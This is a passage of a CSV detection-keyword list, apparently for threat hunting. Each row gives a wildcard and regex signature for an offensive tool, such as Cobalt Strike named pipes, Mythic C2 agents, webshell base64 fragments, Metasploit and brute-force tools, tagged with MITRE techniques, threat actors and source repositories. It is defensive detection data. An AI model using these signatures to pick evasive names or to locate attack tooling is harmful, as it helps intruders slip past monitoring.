"*zsh_executor *",".{0,1000}zsh_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","63508"
"*zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa*",".{0,1000}zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#base64","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","63509"
"*zSI9xWleO7AbADEmAD0kxX4fACJezmMeyt==*",".{0,1000}zSI9xWleO7AbADEmAD0kxX4fACJezmMeyt\=\=.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#base64","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","63510"
"*zsploit-1.txt*",".{0,1000}zsploit\-1\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63511"
"*zsploit-2.txt*",".{0,1000}zsploit\-2\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63512"
"*ztgrace*changeme*",".{0,1000}ztgrace.{0,1000}changeme.{0,1000}","offensive_tool_keyword","changeme","A default credential scanner.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ztgrace/changeme","1","1","N/A","N/A","N/A","10","1478","251","2021-12-26T10:20:11Z","2016-03-11T17:10:34Z","63513"
"*ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo*",".{0,1000}ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","#base64","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","63514"
"*ZXMARGVidWdnaW5nTW9kZXMAZ2V0X1JlZmVyZW5jZWRBc3NlbWJsaWVzAEdldElQR2xvYmFsUHJv*",".{0,1000}ZXMARGVidWdnaW5nTW9kZXMAZ2V0X1JlZmVyZW5jZWRBc3NlbWJsaWVzAEdldElQR2xvYmFsUHJv.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","63515"
"*ZXZpbG1vcnR5Om11bHRpdmVyc2U=*",".{0,1000}ZXZpbG1vcnR5Om11bHRpdmVyc2U\=.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#base64","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","63516"
"*ZXZpZGVuY2UuZmJpLmdvdg==*",".{0,1000}ZXZpZGVuY2UuZmJpLmdvdg\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63517"
"*zyn3rgy/LdapRelayScan*",".{0,1000}zyn3rgy\/LdapRelayScan.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","63518"
"*zzzteph/weakpass*",".{0,1000}zzzteph\/weakpass.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","63519"
"./beef","\.\/beef","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","#linux","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63520"
"./radare *","\.\/radare\s.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1125 - T1071 - T1105 - T1057","TA0010 - TA0002 - TA0007","N/A","N/A","Lateral Movement","https://github.com/souravbaghz/RadareEye","1","0","#linux","N/A","N/A","4","364","49","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z","63521"
"\\demoagent_11","\\\\demoagent_11","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63522"
"\\demoagent_22","\\\\demoagent_22","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63523"
"\\DserNamePipe*","\\\\DserNamePipe.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63524"
"\\f4c3*","\\\\f4c3.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63525"
"\\f53f*","\\\\f53f.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63526"
"\\fullduplex_*","\\\\fullduplex_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63527"
"\\interprocess_*","\\\\interprocess_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63528"
"\\mojo_*","\\\\mojo_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63529"
"\\msagent_*","\\\\msagent_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63530"
"\\MsFteWds*","\\\\MsFteWds.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63531"
"\\MSSE-*","\\\\MSSE\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63532"
